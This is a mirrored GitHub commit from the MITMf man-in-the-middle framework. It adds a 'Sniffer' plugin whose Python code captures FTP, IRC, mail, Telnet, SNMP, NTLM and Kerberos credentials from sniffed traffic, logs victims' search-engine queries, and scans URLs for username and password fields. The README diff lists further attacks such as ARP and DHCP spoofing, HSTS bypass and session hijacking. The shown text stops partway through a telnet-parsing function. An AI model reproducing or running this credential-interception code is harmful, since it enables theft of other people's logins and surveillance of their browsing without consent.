mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
- Added Sniffer plugin
- Custom reactor options are now loaded dynamically from each plugin - Search engine query capture is now enabled with the sniffer plugin - Removed some useless comments and lib imports
This commit is contained in:
parent
fc74e480eb
commit
0c6ac4fb1d
13 changed files with 814 additions and 213 deletions
|
@ -11,6 +11,7 @@ Availible plugins:
|
||||||
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||||
- SSLstrip+ - Partially bypass HSTS
|
- SSLstrip+ - Partially bypass HSTS
|
||||||
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
||||||
|
- Sniffer - Sniffs for various protocol login and auth attempts
|
||||||
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
||||||
- AppCachePoison - Perform app cache poison attacks
|
- AppCachePoison - Perform app cache poison attacks
|
||||||
- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
|
- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
|
||||||
|
@ -26,6 +27,9 @@ Availible plugins:
|
||||||
|
|
||||||
So far the most significant changes have been:
|
So far the most significant changes have been:
|
||||||
|
|
||||||
|
- Addition of the Sniffer plugin which integrates Net-Creds (https://github.com/DanMcInerney/net-creds) currently supported protocols are:
|
||||||
|
FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
|
||||||
|
|
||||||
- Integrated Responder (https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
|
- Integrated Responder (https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
|
||||||
|
|
||||||
- Integrated SSLstrip+ (https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
|
- Integrated SSLstrip+ (https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python2.7
|
||||||
import requests
|
import requests
|
||||||
import json
|
import json
|
||||||
from random import sample
|
from random import sample
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
#! /usr/bin/env python
|
#! /usr/bin/env python2.7
|
||||||
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
|
# MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
|
||||||
# Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
|
# Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
|
||||||
# Copyright (C) 2011 Trustwave
|
# Copyright (C) 2011 Trustwave
|
||||||
|
|
|
@ -38,6 +38,7 @@ class ProxyPlugins:
|
||||||
in handleResponse, but is still annoying.
|
in handleResponse, but is still annoying.
|
||||||
'''
|
'''
|
||||||
_instance = None
|
_instance = None
|
||||||
|
|
||||||
def setPlugins(self,plugins):
|
def setPlugins(self,plugins):
|
||||||
'''Set the plugins in use'''
|
'''Set the plugins in use'''
|
||||||
self.plist = []
|
self.plist = []
|
||||||
|
@ -47,6 +48,7 @@ class ProxyPlugins:
|
||||||
self.pmthds = {}
|
self.pmthds = {}
|
||||||
for p in plugins:
|
for p in plugins:
|
||||||
self.addPlugin(p)
|
self.addPlugin(p)
|
||||||
|
|
||||||
def addPlugin(self,p):
|
def addPlugin(self,p):
|
||||||
'''Load a plugin'''
|
'''Load a plugin'''
|
||||||
self.plist.append(p)
|
self.plist.append(p)
|
||||||
|
@ -55,11 +57,13 @@ class ProxyPlugins:
|
||||||
self.pmthds[mthd].append(getattr(p,mthd))
|
self.pmthds[mthd].append(getattr(p,mthd))
|
||||||
except KeyError:
|
except KeyError:
|
||||||
self.pmthds[mthd] = [getattr(p,mthd)]
|
self.pmthds[mthd] = [getattr(p,mthd)]
|
||||||
|
|
||||||
def removePlugin(self,p):
|
def removePlugin(self,p):
|
||||||
'''Unload a plugin'''
|
'''Unload a plugin'''
|
||||||
self.plist.remove(p)
|
self.plist.remove(p)
|
||||||
for mthd in p.implements:
|
for mthd in p.implements:
|
||||||
self.pmthds[mthd].remove(p)
|
self.pmthds[mthd].remove(p)
|
||||||
|
|
||||||
def hook(self):
|
def hook(self):
|
||||||
'''Magic to hook various function calls in sslstrip'''
|
'''Magic to hook various function calls in sslstrip'''
|
||||||
#gets the function name and args of our caller
|
#gets the function name and args of our caller
|
||||||
|
|
|
@ -51,6 +51,7 @@ class ServerConnection(HTTPClient):
|
||||||
self.postData = postData
|
self.postData = postData
|
||||||
self.headers = headers
|
self.headers = headers
|
||||||
self.client = client
|
self.client = client
|
||||||
|
self.clientInfo = None
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||||
self.plugins = ProxyPlugins.getInstance()
|
self.plugins = ProxyPlugins.getInstance()
|
||||||
|
@ -59,17 +60,6 @@ class ServerConnection(HTTPClient):
|
||||||
self.contentLength = None
|
self.contentLength = None
|
||||||
self.shutdownComplete = False
|
self.shutdownComplete = False
|
||||||
|
|
||||||
#these field names were stolen from the etter.fields file (Ettercap Project)
|
|
||||||
self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
|
|
||||||
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
|
|
||||||
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
|
|
||||||
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
|
|
||||||
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
|
|
||||||
|
|
||||||
self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
|
|
||||||
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
|
|
||||||
'passwort', 'passwrd', 'wppassword', 'upasswd']
|
|
||||||
|
|
||||||
def getPostPrefix(self):
|
def getPostPrefix(self):
|
||||||
return "POST"
|
return "POST"
|
||||||
|
|
||||||
|
@ -86,45 +76,9 @@ class ServerConnection(HTTPClient):
|
||||||
|
|
||||||
logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
|
logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
|
||||||
|
|
||||||
#Capture google searches
|
|
||||||
if ('google' in self.headers['host']):
|
|
||||||
if ('search' in self.uri):
|
|
||||||
self.captureQueries('q')
|
|
||||||
|
|
||||||
#Capture bing searches
|
|
||||||
if ('bing' in self.headers['host']):
|
|
||||||
if ('Suggestions' in self.uri):
|
|
||||||
self.captureQueries('qry')
|
|
||||||
|
|
||||||
#Capture yahoo searches
|
|
||||||
if ('search.yahoo' in self.headers['host']):
|
|
||||||
if ('nresults' in self.uri):
|
|
||||||
self.captureQueries('command')
|
|
||||||
|
|
||||||
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
|
|
||||||
for user in self.http_userfields:
|
|
||||||
username = re.findall("("+ user +")=([^&|;]*)", self.uri, re.IGNORECASE)
|
|
||||||
|
|
||||||
for passw in self.http_passfields:
|
|
||||||
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
|
|
||||||
|
|
||||||
if (username and password):
|
|
||||||
logging.warning(self.clientInfo + "%s Possible Credentials (%s):\n%s" % (self.command, self.headers['host'], self.uri))
|
|
||||||
|
|
||||||
self.plugins.hook()
|
self.plugins.hook()
|
||||||
self.sendCommand(self.command, self.uri)
|
self.sendCommand(self.command, self.uri)
|
||||||
|
|
||||||
def captureQueries(self, search_param):
|
|
||||||
try:
|
|
||||||
for param in self.uri.split('&'):
|
|
||||||
if param.split('=')[0] == search_param:
|
|
||||||
query = str(param.split('=')[1])
|
|
||||||
if query:
|
|
||||||
logging.info(self.clientInfo + "is querying %s for: %s" % (self.headers['host'], query))
|
|
||||||
except Exception, e:
|
|
||||||
error = str(e)
|
|
||||||
logging.warning(self.clientInfo + "Error parsing google search query %s" % error)
|
|
||||||
|
|
||||||
def sendHeaders(self):
|
def sendHeaders(self):
|
||||||
for header, value in self.headers.items():
|
for header, value in self.headers.items():
|
||||||
logging.debug("Sending header: (%s => %s)" % (header, value))
|
logging.debug("Sending header: (%s => %s)" % (header, value))
|
||||||
|
|
30
mitmf.py
30
mitmf.py
|
@ -1,4 +1,4 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
from twisted.web import http
|
from twisted.web import http
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
|
@ -13,7 +13,7 @@ import argparse
|
||||||
try:
|
try:
|
||||||
import user_agents
|
import user_agents
|
||||||
except:
|
except:
|
||||||
pass
|
print "[*] user_agents library missing! User-Agent parsing will be disabled!"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from configobj import ConfigObj
|
from configobj import ConfigObj
|
||||||
|
@ -101,25 +101,23 @@ if __name__ == "__main__":
|
||||||
rootLogger.addHandler(fileHandler)
|
rootLogger.addHandler(fileHandler)
|
||||||
|
|
||||||
#All our options should be loaded now, pass them onto plugins
|
#All our options should be loaded now, pass them onto plugins
|
||||||
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
|
print "[*] MITMf v%s started... initializing plugins" % mitmf_version
|
||||||
if ('--responder' and '--wpad') in sys.argv:
|
|
||||||
args.listen = 3141
|
|
||||||
print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
|
|
||||||
|
|
||||||
load = []
|
load = []
|
||||||
try:
|
|
||||||
for p in plugins:
|
for p in plugins:
|
||||||
if getattr(args, p.optname):
|
try:
|
||||||
|
if getattr(args, p.optname):
|
||||||
p.initialize(args)
|
p.initialize(args)
|
||||||
load.append(p)
|
load.append(p)
|
||||||
except NotImplementedError:
|
except NotImplementedError:
|
||||||
print "Plugin %s lacked initialize function." % p.name
|
print "Plugin %s lacked initialize function." % p.name
|
||||||
|
|
||||||
#Plugins are ready to go, start MITMf
|
#Plugins are ready to go, start MITMf
|
||||||
if args.disproxy:
|
if args.disproxy:
|
||||||
ProxyPlugins.getInstance().setPlugins(load)
|
ProxyPlugins.getInstance().setPlugins(load)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
|
|
||||||
from libs.sslstrip.StrippingProxy import StrippingProxy
|
from libs.sslstrip.StrippingProxy import StrippingProxy
|
||||||
from libs.sslstrip.URLMonitor import URLMonitor
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
|
@ -132,9 +130,17 @@ if __name__ == "__main__":
|
||||||
|
|
||||||
reactor.listenTCP(args.listen, strippingFactory)
|
reactor.listenTCP(args.listen, strippingFactory)
|
||||||
|
|
||||||
|
#load reactor options for plugins that have the 'plugin_reactor' attribute
|
||||||
|
for p in plugins:
|
||||||
|
if getattr(args, p.optname):
|
||||||
|
if hasattr(p, 'plugin_reactor'):
|
||||||
|
p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
|
||||||
|
|
||||||
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
|
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
|
||||||
|
|
||||||
if args.hsts:
|
if args.hsts:
|
||||||
print "[*] sslstrip+ by Leonardo Nve running..."
|
print "[*] sslstrip+ by Leonardo Nve running..."
|
||||||
|
|
||||||
print "[*] sergio-proxy v%s online" % sergio_version
|
print "[*] sergio-proxy v%s online" % sergio_version
|
||||||
|
|
||||||
reactor.run()
|
reactor.run()
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
|
|
|
@ -1,7 +1,3 @@
|
||||||
################################################################################################
|
|
||||||
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
|
||||||
#################################################################################################
|
|
||||||
|
|
||||||
"""
|
"""
|
||||||
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#import os
|
|
||||||
#import subprocess
|
|
||||||
import sys
|
import sys
|
||||||
import logging
|
import logging
|
||||||
import time
|
import time
|
||||||
|
|
|
@ -4,6 +4,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er
|
||||||
from scapy.all import get_if_addr
|
from scapy.all import get_if_addr
|
||||||
from libs.responder.Responder import start_responder
|
from libs.responder.Responder import start_responder
|
||||||
from libs.sslstrip.DnsCache import DnsCache
|
from libs.sslstrip.DnsCache import DnsCache
|
||||||
|
from twisted.internet import reactor
|
||||||
import sys
|
import sys
|
||||||
import os
|
import os
|
||||||
import threading
|
import threading
|
||||||
|
@ -12,7 +13,6 @@ class Responder(Plugin):
|
||||||
name = "Responder"
|
name = "Responder"
|
||||||
optname = "responder"
|
optname = "responder"
|
||||||
desc = "Poison LLMNR, NBT-NS and MDNS requests"
|
desc = "Poison LLMNR, NBT-NS and MDNS requests"
|
||||||
#implements = ["handleResponse"]
|
|
||||||
has_opts = True
|
has_opts = True
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
|
@ -41,15 +41,13 @@ class Responder(Plugin):
|
||||||
for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
|
for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
|
||||||
DnsCache.getInstance().setCustomRes(name, self.ip_address)
|
DnsCache.getInstance().setCustomRes(name, self.ip_address)
|
||||||
|
|
||||||
if '--spoof' not in sys.argv:
|
|
||||||
print '[*] Setting up iptables'
|
|
||||||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
|
||||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
|
|
||||||
|
|
||||||
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
|
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
|
def plugin_reactor(self, strippingFactory):
|
||||||
|
reactor.listenTCP(3141, strippingFactory)
|
||||||
|
|
||||||
def add_options(self, options):
|
def add_options(self, options):
|
||||||
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
||||||
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||||
|
@ -60,8 +58,3 @@ class Responder(Plugin):
|
||||||
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
||||||
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
|
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
|
||||||
options.add_argument('--verbose', dest="Verbose", default=False, action="store_true", help="More verbose")
|
options.add_argument('--verbose', dest="Verbose", default=False, action="store_true", help="More verbose")
|
||||||
|
|
||||||
def finish(self):
|
|
||||||
if '--spoof' not in sys.argv:
|
|
||||||
print '\n[*] Flushing iptables'
|
|
||||||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
|
|
@ -10,6 +10,7 @@ class SMBAuth(Inject, Plugin):
|
||||||
name = "SMBAuth"
|
name = "SMBAuth"
|
||||||
optname = "smbauth"
|
optname = "smbauth"
|
||||||
desc = "Evoke SMB challenge-response auth attempts"
|
desc = "Evoke SMB challenge-response auth attempts"
|
||||||
|
has_opts = True
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
Inject.initialize(self, options)
|
Inject.initialize(self, options)
|
||||||
|
|
780
plugins/Sniffer.py
Normal file
780
plugins/Sniffer.py
Normal file
|
@ -0,0 +1,780 @@
|
||||||
|
#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds
|
||||||
|
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
import logging
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
|
from scapy.all import *
|
||||||
|
from sys import exit
|
||||||
|
from collections import OrderedDict
|
||||||
|
from StringIO import StringIO
|
||||||
|
import binascii
|
||||||
|
import struct
|
||||||
|
import pcap
|
||||||
|
import base64
|
||||||
|
import threading
|
||||||
|
import re
|
||||||
|
import os
|
||||||
|
|
||||||
|
class Sniffer(Plugin):
|
||||||
|
name ='Sniffer'
|
||||||
|
optname = "sniffer"
|
||||||
|
desc = "Sniffs for various protocol login and auth attempts"
|
||||||
|
implements = ["sendRequest"]
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
self.interface = options.interface
|
||||||
|
|
||||||
|
#these field names were stolen from the etter.fields file (Ettercap Project)
|
||||||
|
self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
|
||||||
|
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
|
||||||
|
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
|
||||||
|
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
|
||||||
|
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
|
||||||
|
|
||||||
|
self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
|
||||||
|
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
|
||||||
|
'passwort', 'passwrd', 'wppassword', 'upasswd']
|
||||||
|
|
||||||
|
if os.geteuid() != 0:
|
||||||
|
sys.exit("[-] Sniffer plugin requires root privileges")
|
||||||
|
|
||||||
|
n = NetCreds()
|
||||||
|
|
||||||
|
print "[*] Sniffer plugin online"
|
||||||
|
t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,))
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
|
|
||||||
|
def sendRequest(self, request):
|
||||||
|
#Capture google searches
|
||||||
|
if ('google' in request.headers['host']):
|
||||||
|
if ('search' in request.uri):
|
||||||
|
self.captureQueries('q', request)
|
||||||
|
|
||||||
|
#Capture bing searches
|
||||||
|
if ('bing' in request.headers['host']):
|
||||||
|
if ('Suggestions' in request.uri):
|
||||||
|
self.captureQueries('qry', request)
|
||||||
|
|
||||||
|
#Capture yahoo searches
|
||||||
|
if ('search.yahoo' in request.headers['host']):
|
||||||
|
if ('nresults' in request.uri):
|
||||||
|
self.captureQueries('command', request)
|
||||||
|
|
||||||
|
self.captureURLCreds(request)
|
||||||
|
|
||||||
|
def captureQueries(self, search_param, request):
|
||||||
|
try:
|
||||||
|
for param in request.uri.split('&'):
|
||||||
|
if param.split('=')[0] == search_param:
|
||||||
|
query = str(param.split('=')[1])
|
||||||
|
if query:
|
||||||
|
logging.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query))
|
||||||
|
except Exception, e:
|
||||||
|
error = str(e)
|
||||||
|
logging.warning(request.clientInfo + "Error parsing search query %s" % error)
|
||||||
|
|
||||||
|
def captureURLCreds(self, request):
|
||||||
|
'''
|
||||||
|
checks for creds passed via GET requests or just in the url
|
||||||
|
It's surprising to see how many people still do this (please stahp)
|
||||||
|
'''
|
||||||
|
|
||||||
|
url = request.uri
|
||||||
|
|
||||||
|
username = None
|
||||||
|
password = None
|
||||||
|
for user in self.http_userfields:
|
||||||
|
#search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE)
|
||||||
|
search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE)
|
||||||
|
if search:
|
||||||
|
username = search.group()
|
||||||
|
|
||||||
|
for passw in self.http_passfields:
|
||||||
|
#search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE)
|
||||||
|
search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE)
|
||||||
|
if search:
|
||||||
|
password = search.group()
|
||||||
|
|
||||||
|
if (username and password):
|
||||||
|
logging.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url))
|
||||||
|
|
||||||
|
class NetCreds:
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.pkt_frag_loads = OrderedDict()
|
||||||
|
self.challenge_acks = OrderedDict()
|
||||||
|
self.mail_auths = OrderedDict()
|
||||||
|
self.telnet_stream = OrderedDict()
|
||||||
|
|
||||||
|
# Regexs
|
||||||
|
self.authenticate_re = '(www-|proxy-)?authenticate'
|
||||||
|
self.authorization_re = '(www-|proxy-)?authorization'
|
||||||
|
self.ftp_user_re = r'USER (.+)\r\n'
|
||||||
|
self.ftp_pw_re = r'PASS (.+)\r\n'
|
||||||
|
self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
|
||||||
|
self.irc_pw_re = r'NS IDENTIFY (.+)'
|
||||||
|
self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
|
||||||
|
self.mail_auth_re1 = '(\d+ )?login '
|
||||||
|
self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
|
||||||
|
self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
|
||||||
|
|
||||||
|
def start(self, interface):
|
||||||
|
sniff(iface=interface, prn=self.pkt_parser, store=0)
|
||||||
|
|
||||||
|
def frag_remover(self, ack, load):
|
||||||
|
'''
|
||||||
|
Keep the FILO OrderedDict of frag loads from getting too large
|
||||||
|
3 points of limit:
|
||||||
|
Number of ip_ports < 50
|
||||||
|
Number of acks per ip:port < 25
|
||||||
|
Number of chars in load < 5000
|
||||||
|
'''
|
||||||
|
|
||||||
|
# Keep the number of IP:port mappings below 50
|
||||||
|
# last=False pops the oldest item rather than the latest
|
||||||
|
while len(self.pkt_frag_loads) > 50:
|
||||||
|
self.pkt_frag_loads.popitem(last=False)
|
||||||
|
|
||||||
|
# Loop through a deep copy dict but modify the original dict
|
||||||
|
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||||
|
for ip_port in copy_pkt_frag_loads:
|
||||||
|
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||||
|
# Keep 25 ack:load's per ip:port
|
||||||
|
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||||
|
self.pkt_frag_loads[ip_port].popitem(last=False)
|
||||||
|
|
||||||
|
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||||
|
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||||
|
for ip_port in copy_pkt_frag_loads:
|
||||||
|
# Keep the load less than 75,000 chars
|
||||||
|
for ack in copy_pkt_frag_loads[ip_port]:
|
||||||
|
# If load > 5000 chars, just keep the last 200 chars
|
||||||
|
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||||
|
self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:]
|
||||||
|
|
||||||
|
def frag_joiner(self, ack, src_ip_port, load):
|
||||||
|
'''
|
||||||
|
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||||
|
'''
|
||||||
|
for ip_port in self.pkt_frag_loads:
|
||||||
|
if src_ip_port == ip_port:
|
||||||
|
if ack in self.pkt_frag_loads[src_ip_port]:
|
||||||
|
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||||
|
old_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||||
|
concat_load = old_load + load
|
||||||
|
return OrderedDict([(ack, concat_load)])
|
||||||
|
|
||||||
|
return OrderedDict([(ack, load)])
|
||||||
|
|
||||||
|
def pkt_parser(self, pkt):
|
||||||
|
'''
|
||||||
|
Start parsing packets here
|
||||||
|
'''
|
||||||
|
|
||||||
|
if pkt.haslayer(Raw):
|
||||||
|
load = pkt[Raw].load
|
||||||
|
|
||||||
|
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
|
||||||
|
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
|
||||||
|
return
|
||||||
|
|
||||||
|
# UDP
|
||||||
|
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
|
||||||
|
|
||||||
|
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
|
||||||
|
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
|
||||||
|
|
||||||
|
# SNMP community strings
|
||||||
|
if pkt.haslayer(SNMP):
|
||||||
|
self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
|
||||||
|
return
|
||||||
|
|
||||||
|
# Kerberos over UDP
|
||||||
|
decoded = self.Decode_Ip_Packet(str(pkt)[14:])
|
||||||
|
kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:])
|
||||||
|
if kerb_hash:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, kerb_hash)
|
||||||
|
|
||||||
|
# TCP
|
||||||
|
elif pkt.haslayer(TCP) and pkt.haslayer(Raw):
|
||||||
|
|
||||||
|
ack = str(pkt[TCP].ack)
|
||||||
|
seq = str(pkt[TCP].seq)
|
||||||
|
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
|
||||||
|
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
|
||||||
|
self.frag_remover(ack, load)
|
||||||
|
self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load)
|
||||||
|
full_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||||
|
|
||||||
|
# Limit the packets we regex to increase efficiency
|
||||||
|
# 750 is a bit arbitrary but some SMTP auth success pkts
|
||||||
|
# are 500+ characters
|
||||||
|
if 0 < len(full_load) < 750:
|
||||||
|
|
||||||
|
# FTP
|
||||||
|
ftp_creds = self.parse_ftp(full_load, dst_ip_port)
|
||||||
|
if len(ftp_creds) > 0:
|
||||||
|
for msg in ftp_creds:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, msg)
|
||||||
|
return
|
||||||
|
|
||||||
|
# Mail
|
||||||
|
mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
|
||||||
|
|
||||||
|
# IRC
|
||||||
|
irc_creds = self.irc_logins(full_load)
|
||||||
|
if irc_creds != None:
|
||||||
|
self.printer(src_ip_port, dst_ip_port, irc_creds)
|
||||||
|
return
|
||||||
|
|
||||||
|
# Telnet
|
||||||
|
self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
||||||
|
#if telnet_creds != None:
|
||||||
|
# printer(src_ip_port, dst_ip_port, telnet_creds)
|
||||||
|
# return
|
||||||
|
|
||||||
|
# HTTP and other protocols that run on TCP + a raw load
|
||||||
|
self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
|
||||||
|
|
||||||
|
def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq):
|
||||||
|
'''
|
||||||
|
Catch telnet logins and passwords
|
||||||
|
'''
|
||||||
|
|
||||||
|
msg = None
|
||||||
|
|
||||||
|
if src_ip_port in self.telnet_stream:
|
||||||
|
# Do a utf decode in case the client sends telnet options before their username
|
||||||
|
# No one would care to see that
|
||||||
|
try:
|
||||||
|
self.telnet_stream[src_ip_port] += load.decode('utf8')
|
||||||
|
except UnicodeDecodeError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# \r or \r\n terminate commands in telnet if my pcaps are to be believed
|
||||||
|
if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]:
|
||||||
|
telnet_split = self.telnet_stream[src_ip_port].split(' ', 1)
|
||||||
|
cred_type = telnet_split[0]
|
||||||
|
value = telnet_split[1].replace('\r\n', '').replace('\r', '')
|
||||||
|
